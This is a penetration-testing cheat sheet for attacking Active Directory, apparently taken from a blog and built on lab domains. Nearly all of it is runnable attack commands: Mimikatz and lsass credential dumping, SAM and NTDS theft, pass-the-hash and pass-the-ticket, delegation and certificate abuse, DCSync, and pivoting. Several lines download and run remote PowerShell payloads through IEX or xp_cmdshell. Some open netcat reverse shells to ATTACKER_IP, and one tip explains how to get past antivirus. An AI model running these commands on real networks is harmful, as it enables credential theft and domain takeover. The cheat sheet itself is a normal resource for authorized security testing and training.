ldapsearch -x -b <search_base> -H <ldap_host> -D <bind_dn> -W
ldapsearch -x -b "dc=devconnected,dc=com" -H ldap://192.168.178.29
python windapsearch.py -u morph3 -p morph3 -d evil.corp –dc-ip 192.168.1.2
python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rdGroup Managed Service Accounts – gMSA
# If service account exists on target, enumerate gMSA.
# Group Managed Service Accounts provide a higher security option for non-interactive applications, services, processes, or tasks that run automatically but need a security credential.
# Example
Import-Module ActiveDirectory
Get-ADPrincipalGroupMembership svc_apache$ | select name
# Check if your user is allowed to retrieve managed passwords
Get-ADServiceAccount -Identity 'svc_apache$' -Properties * | Select PrincipalsAllowedToRetrieveManagedPassword
# Repo for reading gMSA passwords
https://github.com/rvazarkar/GMSAPasswordReader
.\GMSAPasswordReader.exe --accountname svc_apache
# Now either try to crack the hash or pass the hash using any of the techniques in this blogpost. Local Privilege Escalation
If you have valid credentials, try to escalate to local administrator in order to be able to dump password hashed.
Checklist and tools to check for PrivEsc
# Checklist for local windows privilege escalation
https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
# Notes
https://blog.aghanim.net/?p=1314
# Use WinPEASS
kali> peass
# PowerView.ps1
# https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview
Import-Module powerview.ps1
# PowerUp.ps1
# https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/powerup
. .\powerup.ps1
Invoke-AllChecks
# seatbelt
# https://github.com/GhostPack/Seatbelt
# Run all checks
Seatbelt.exe -group=all -full
# JAWS
# https://github.com/411Hall/JAWS
# Run from within CMD shell and write out to screen.
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1Abusing GPO Permission
# See PG Vault writeup
# If you have write permission to a GPO, try using SharpGPOAbuse
# https://github.com/byronkg/SharpGPOAbuse/tree/main/SharpGPOAbuse-master
# Precompiled exe is located here https://github.com/Flangvik/SharpCollection/tree/master/NetFramework_4.0_x64
# See github for more commands
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"Lateral movement with privileged creds/session
Windows Credentials
CheatSheet II – Advanced – BOOK_GHANIM
Hash extraction
Dump all the hashes in memory and locally.
If mimikatz.exe dont work on reverse shell, try generating a msfvenom with -f psh-cmd and try again. Mimikatz should work now. It does not work with nishang invoke-powershelltcp for some reason.
# Credentials Mimikatz
# Elevate Privileges to extract the credentials
privilege::debug # This should give an error if you are Admin, but if it does, check if the SeDebugPrivilege was removed from Admins
token::elevate
#Extract from lsass (memory)
sekurlsa::logonpasswords
#Extract from lsass (service)
lsadump::lsa /inject
#Extract from SAM
lsadump::sam
#One liner
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "exit"
# Invoke-Mimikatz
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds #Dump creds from memory
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "exit"'
# Meterpreter
#Credentials from SAM
post/windows/gather/smart_hashdump
hashdump
#Using kiwi module
load kiwi
creds_all
kiwi_cmd "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam"
#Using Mimikatz module
load mimikatz
mimikatz_command -f "sekurlsa::logonpasswords"
mimikatz_command -f "lsadump::lsa /inject"
mimikatz_command -f "lsadump::sam"
# Bypass Anti-Virus
# Procdump from SysInternals is a legitimate Microsoft tool, and is not detected by Defender. Use this tool to dump lsass process, download the dump and extract creds locally from the dump
#Local
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
#Remote, mount https://live.sysinternals.com which contains procdump.exe
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Extract creds from dump
//Load the dump
mimikatz # sekurlsa::minidump lsass.dmp
//Extract credentials
mimikatz # sekurlsa::logonPasswords
# Automatically done with SprayKatz https://github.com/aas-n/spraykatz.
./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24
# Dumping lsass with comsvcs.dll
https://book.hacktricks.xyz/windows-hardening/stealing-credentials#dumping-lsass-with-comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full
# Dumping lsass with Task Manager
https://book.hacktricks.xyz/windows-hardening/stealing-credentials#dumping-lsass-with-task-manager
# Dumping lsass with procdump
Get-Process -Name LSASS
.\procdump.exe -ma 608 lsass.dmp
------------------------------------------------------------------------
# CrackMapExec
# Dump SAM hashes
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
# Dump LSA secrets
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
# Dump the NTDS.dit from target DC
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
# Dump the NTDS.dit password history from target DC
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
# Show the pwdLastSet attribute for each NTDS.dit account
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
------------------------------------------------------------------------
# Stealing SAM & SYSTEM
https://book.hacktricks.xyz/windows-hardening/stealing-credentials#stealing-sam-and-system
# This files should be located in C:\windows\system32\config\SAM and C:\windows\system32\config\SYSTEM. But you cannot just copy them in a regular way because they protected.
# From registry
# Easiest method
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
# Download to attacker
samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL
# Invoke-NinjaCopy
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
# Use PS script to make copy of SAM, SYSTEM and ntds.dit
Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"Pass the Hash
https://book.hacktricks.xyz/windows-hardening/ntlm#pass-the-hash
Lateral Movement: Pass the Hash Attack
Once you have the hash of the victim, you can use it to impersonate it.
# Mimikatz
# This will launch a process that will belongs to the users that have launch mimikatz but internally in LSASS the saved credentials are the ones inside the mimikatz parameters. Then, you can access to network resources as if you where that user (similar to the runas /netonly trick but you don't need to know the plain-text password).
# 1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'
# 2
privilege::debug
sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38
------------------------------------------------------------------
# Pass-the-hash from linux
# Connect via psexec using PTH
psexec.py -hashed LM:NT user@ip
python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161
# Connect to RDP using PTH
xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH
# Pass the hash with evil-winrm
evil-winrm -u <username> -H <Hash> -i <IP>
# SMBclient
python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.105
# Crackmapexec
crackmapexec smb 192.168.1.105 -u Administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig
# rpcdump
python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.105
---------------------------------------------------------------
# PTH toolkit builtin in Kali linux
# smbclinet
pth-smbclient -U test.local/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105/c$
# wmic
pth-wmic -U test.local/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105 "select Name from Win32_UserAccount"
# rpcclient
pth-rpcclient -U test.local/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105
# net
pth-net rpc share list -U 'ignite\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.105
# curl
pth-curl --ntlm -u Administrator:32196B56FFE6F45E294117B91A83BF38 http://192.168.1.105/file.txt
------------------------------------------------------------------
# Impacket Windows compiled tools
psexec_windows.exe C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local
wmiexec.exe wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local
atexec.exe (In this case you need to specify a command, cmd.exe and powershell.exe are not valid to obtain an interactive shell)C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'
# Powershell wmiexec
https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1
Invoke-WMIExec -Target 192.168.1.105 -Domain test.local -Username Administrator -Hash 32196B56FFE6F45E294117B91A83BF38 -Command "cmd /c mkdir c:\hacked" -Verbose
------------------------------------------------------------------
# Invoke-TheHash
https://github.com/Kevin-Robertson/Invoke-TheHash
# Invoke-SMBExec
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
# Invoke-WMIExec
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
# Invoke-SMBClient
Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose
# Invoke-SMBEnum
Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74
------------------------------------------------------------------
# Powershell Empire
usemodule lateral_movement/invoke_smbexec
set ComputerName WIN-S0V7KMTVLD2.ignite.local
set Username Administrator
set Hash 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
set Listener http
execute
-----------------------------------------------------------------
# Metasploit
use exploit/windows/smb/psexec
set rhosts 192.168.1.105
set smbuser administrator
set smbdomain test.local
set smbpass 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
exploitOver Pass the Hash/Pass the key (PTK)
This attack aims to use the user NTLM hash to request Kerberos tickets, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially useful in networks where NTLM protocol is disabled and only Kerberos is allowed as authentication protocol.
# We need the NTLM hash or password of the target user account in order to perform this attack. When hash is obtained we can request a TGT. We can access any service or machine where the user account has permission.
python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
-aesKey [AES Key] to specify to use AES256
Pass the Ticket
Similar to PTK, but instead we steal the ticket and use it to authenticate as its owner.
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
# Swapping Linux and Windows tickets between platforms
https://github.com/Zer1t0/ticket_converter (Ticket converter script)
# Only param needed is current ticket and output file.
root@kali:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi
root@kali:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache
# To convert in windows, use Kekeo https://github.com/gentilkiwi/kekeo
-----------------------------------------------------------------------
# Pass the ticket attack
# Linux
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass
# Windows
# Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
-----------------------------------------------------------------------
# We can obtain the Kerberos encryption keys from memory by using mimikatz with the following commands:
mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys
# Depending on the available keys, we can run the following commands on mimikatz to get a reverse shell via Pass-the-Key:
# If we have the RC4 hash:
mimikatz# sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"
# If we have the AES128 hash:
mimikatz# sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes128:b65ea8151f13a31d01377f5934bf3883 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"
# If we have the AES256 hash:
mimikatz# sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes256:b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"
MSSQL Trusted Links
If a user has privileges to access MSSQL instances, he could be able to use it to execute commands in the MSSQL host (if running as SA).
# Powershell
https://github.com/NetSPI/PowerUpSQL/blob/master/PowerUpSQL.psd1
Import-Module .\PowerupSQL.psd1
#Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10
#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
# FROM INSIDE OF THE DOMAIN
#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
#Crawl trusted links, starting form the given one (the user being used by the MSSQL instance is also specified)
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose
#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "<INSTANCE1>" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'
#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"
#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'
#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"Unconstrained Delegation
This a feature that a Domain Administrator can set to any Computer inside the domain. Then, anytime a user logins onto the Computer, a copy of the TGT of that user is going to be sent inside the TGS provided by the DC and saved in memory in LSASS. So, if you have Administrator privileges on the machine, you will be able to dump the tickets and impersonate the users on any machine.
So if a domain admin logins inside a Computer with “Unconstrained Delegation” feature activated, and you have local admin privileges inside that machine, you will be able to dump the ticket and impersonate the Domain Admin anywhere (domain privesc).
What is DCSync attack?
A DCSync attack uses commands in Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to pretend to be a domain controller (DC) in order to get user credentials from another DC
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/unconstrained-delegation
# You can find Computer objects with this attribute checking if the userAccountControl attribute contains ADS_UF_TRUSTED_FOR_DELEGATION. You can do this with an LDAP filter of ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, which is what powerview does:
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Load the ticket of Administrator (or victim user) in memory with Mimikatz or Rubeus for a Pass the Ticket.
.\Rubeus.exe ptt /ticket:<base 64 ticket>
# Automatically compormise a print server
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/unconstrained-delegation#automatically-compromising-a-print-server
.\SpoolSample.exe printmachine unconstrinedmachine
# If the TGT is from a DC, you could perform a DCSync attack and get all the hashes from DC. https://www.youtube.com/watch?v=QfyZQDyeXjQ
Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'
# Use secretsdump if my user have DCsync rights
python3 secretsdump.py aghanim:password@10.10.10.161
Constrained Delegation
If a user or computer is allowed for “Constrained Delegation” it will be able to impersonate any user to access some services in a computer. Then, if you compromise the hash of this user/computer you will be able to impersonate any user (even domain admins) to access some services.
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology#constrained-delegation
# userAccountControl
# If a service account has a userAccountControl value containing TRUSTED_TO_AUTH_FOR_DELEGATION (T2A4D), then it can obtains a TGS for itself (the service) on behalf of any other user.
# msDS-AllowedToDelegateTo
# A service account could obtain a TGS on behalf any user to the service set in msDS-AllowedToDelegateTo. To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one.
# Enumerate from PowerView
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# Kekeo.exe and Mimikatz.exe
# Obtain a TGT for the Constained allowed user
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
# Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
# Load the TGS in memory
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
# Rubeus
# Obtain a TGT for the Constained allowed user
.\Rubeus.exe asktgt /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi
# Obtain a TGS of the Administrator user to self
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator
# Obtain service TGS impersonating Administrator (CIFS)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS
# Impersonate Administrator on different service (HOST)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST
# Load ticket in memory
.\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local
EXAMPLE – GenericAll permission to Computer Object – Resource based Constrained delegation attack
See notes for Resourced box
# The attacker can pass-the-ticket and impersonate the user to gain access to the victim.
# To check the MachineAccountQuota of the domain you can use:
Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select MachineAccountQuota
# Attack
# Creating a Computer Object
# You can create a computer object inside the domain using :
Import-Module .\powermad.ps1
New-MachineAccount -MachineAccount FAKECOMPUTER -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Get-DomainComputer FAKECOMPUTER #Check if created if you have powerview
# Performing a complete S4U attack
# First of all, we created the new Computer object with the password 123456, so we need the hash of that password:
.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local
# This will print the RC4 and AES hashes for that account.
# Now, the attack can be performed. Just use on of the hash types, not all of them :
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<aes256 hash> /aes128:<aes128 hash> /rc4:<rc4 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt
# You can generate more tickets just asking once using the /altservice param of Rubeus:
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt
### Note that users has an attribute called "Cannot be delegated". If a user has this attribute to True, you won't be able to impersonate him . This property can be seen inside bloodhound.
# Accessing
# The last command line will perform the complete S4U attack and will inject the TGS from Administrator to the victim host in memory.
In this example it was requested a TGS for the CIFS service from Administrator, so you will be able to access C$:
ls \\victim.domain.local\C$
# METHOD 2 - GETTING A SHELL
# Create a new machine account on the domain
impacket-addcompiter resourced.local/l.livingstone -dc-ip 192.168.200.175 -hashes :<LM-hash> -computer-name 'FAKECOMPUTER$' -computer-pass '123456'
# Verify that the machine account was added to the domain. Must be done through a shell on the Windows.
*Evil-WinRM* PS C:\Users\l.livingstone\Documents> Get-ADComputer FAKECOMPUTER
# Manage delegation rights by using rbcd.py and use it to set msDS-AllowedToActOnBehalfOfOtherIdentity on our new machine account
https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py
python3 rbcd.py -dc-ip 192.168.200.175 -t RESOURCEDC -f 'FAKECOMPUTER' -hashes :<LM-hash> resourced\\l.livingstone
# Confirm that the action was successful
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> Get-adcomputer resourcedc -properties msds-allowedtoactonbehalfofotheridentity |select -expand msds-allowedtoactonbehalfofotheridentity
# We now need to get the administrator service ticket. We can do this by using impacket-getST with our privileged machine account.
/usr/bin/impacket-getST -spn cifs/resourcedc.resourced.local resourced/FAKECOMPUTEr$:'123456' -impersonate Administrator -dc-ip 192.168.200.175
# The ticket is aved on our attacker machine as Administrator.ccache. Export the environment variable named KRB5CCNAME with the location of file
export KRB5CCNAME=./Administrator.ccache
# Use psexec to get a shell
/usr/bin/impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.200.175
Desc from BloodHound
# Full control of a computer object can be used to perform a resource based constrained delegation attack. Abusing this primitive is currently only possible through the Rubeus project.
# First, if an attacker does not control an account with an SPN set, Kevin Robertson's Powermad project can be used to add a new attacker-controlled computer account:
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
# PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account:
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
# We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the comptuer account we're taking over, again using PowerView in this case:
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
# We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:
Rubeus.exe hash /password:Summer2018!
# And finally we can use Rubeus' *s4u* module to get a service ticket for the service name (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER:
Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /pttDCSync
impacket-secretsdump domain.com/domainadmin01@dc_IP -hashes :NTLM_HASH -dc-ip DC_IP -outfile dcsync.txt ACLs Abuse
Printer Spooler service abuse
If the Print Spooler service is enabled, you can use some already known AD credentials to request to the Domain Controller’s print server an update on new print jobs and just tell it to send the notification to some system.
# Finding Windows servers on the domain
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
# Finding spooler services listening
. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
# For linux, use rpcdump.py
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
# Ask service to authenticate against an arbitrary host
# https://github.com/NotMedic/NetNTLMtoSilverTicket
SpoolSample.exe <TARGET> <RESPONDERIP>
# For linux use
# https://github.com/NotMedic/NetNTLMtoSilverTicket
# https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>Zerologon
# https://github.com/dirkjanm/CVE-2020-1472
# https://www.secura.com/blog/zero-logon
# Bypass authentication and gain administrator-level privileges in a matter of seconds. If vulnerable.
# Test for zerologon
https://github.com/SecuraBV/CVE-2020-1472
# PoC
https://github.com/dirkjanm/CVE-2020-1472AD CS Domain Escalation
Active Directory Certificate Services (AD CS) is a Microsoft platform that provides a variety of security functions to protect digital certificates within an organization. However, a problem has been identified whereby some AD CS settings are not properly configured, which can leave the system vulnerable to attackers.
The issue arises when attackers exploit this vulnerability to obtain unauthorized certificates. These certificates can then be used to gain access to areas of the network or impersonate individuals they should not have access to. For instance, an attacker could potentially gain a certificate that enables them to impersonate a network administrator and thereby gain unrestricted access to sensitive data.
# https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
# https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/account-persistence
# https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
# https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence
# https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft
------------
# List all vulnerable template
certipy find -dc-only -target-ip 10.10.10.10 -u USER -p PASSWORD -target -dc01.domain.com -vulnerable -timeout 120
# If user have enrollment rights on a template it is possible to obtain valid certificate for all valid users and domain admins. The certificate and private key will be safed in a .pfx file.
certipy req -u USER -p PASSWORD -target PKI01.domain.com -target 10.10.10.11 -template template01 -ca "domain-issuing-CA" -upn "domainadmin01"
# Retriev NTLM hash for domain admin
certipy auth -pfx domainadmin01.pfx -domain domain.com
# Now, pass the hash using desired tool.
crackmapexec smb 10.10.10.12 -u domainadmin01 -H ntlm_hash
Pivoting
Tunnelling/ Proxying
# CHISEL AND PROXYCHAINS AND FOXYPROXY
# Using Chisel to make a proxy. Notice that the proxy port opens on 1080, rather than listening port (37777).
# Attacker machine
chisel server -p 37777 --reverse
# Target machine
./chisel client Attacker-IP:37777 R:socks
# Now in Proxychain config file /etc/proxychains4.conf add the proxy port
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
# Now when you run can reach other target on the network using proxychains. So it looks like this Attacker machine --SOCKS proxy --> 10.200.57.200 on port 1080 --> 10.200.57.150 (Unreachable from attacker).
proxychains nc -vn 10.200.57.150 3389
# Or in the case of the THM box Wreath. If I want to run the GitStack exploit from my attacker to 10.200.57.150 (Which is unreachable withouth proxy or tunnel).
proxychains python2 exploit.py.
# OR by using foxy proxy if I want to access http.
# Add a new proxy. Proxy type = SOCKS5 (chisel uses socks5), IP = 127.0.0.1, Port = Proxy prot (1080).
# And start foxy proxy. Now I can access the webserver on.
# I can also use proxychains to access HTTP.
proxychains firefox.
# This will open firefox through proxychains.
-----------------------------------------------
# SSHUTTLE
# Simulate a VPN tunnel using sshuttle. Now I can reach other targets, which originally was unreacheable, on the network by going through 172.16.0.5
sshuttle -r user@172.16.0.5 --ssh-cmd "ssh -i private_key" 172.16.0.0/24
Port Forwarding
# -L means portforwarding. This will forward port 80 on host 172.16.0.10 to our attacker on port 8000. Can access the port (webserver) by typing localhost:8000.
ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fNPost-exploitation with high privileged account
Once you get Domain Admin or Enterprise Admin you can dump the domain database: ntds.dit.
Dumping Domain Credentials
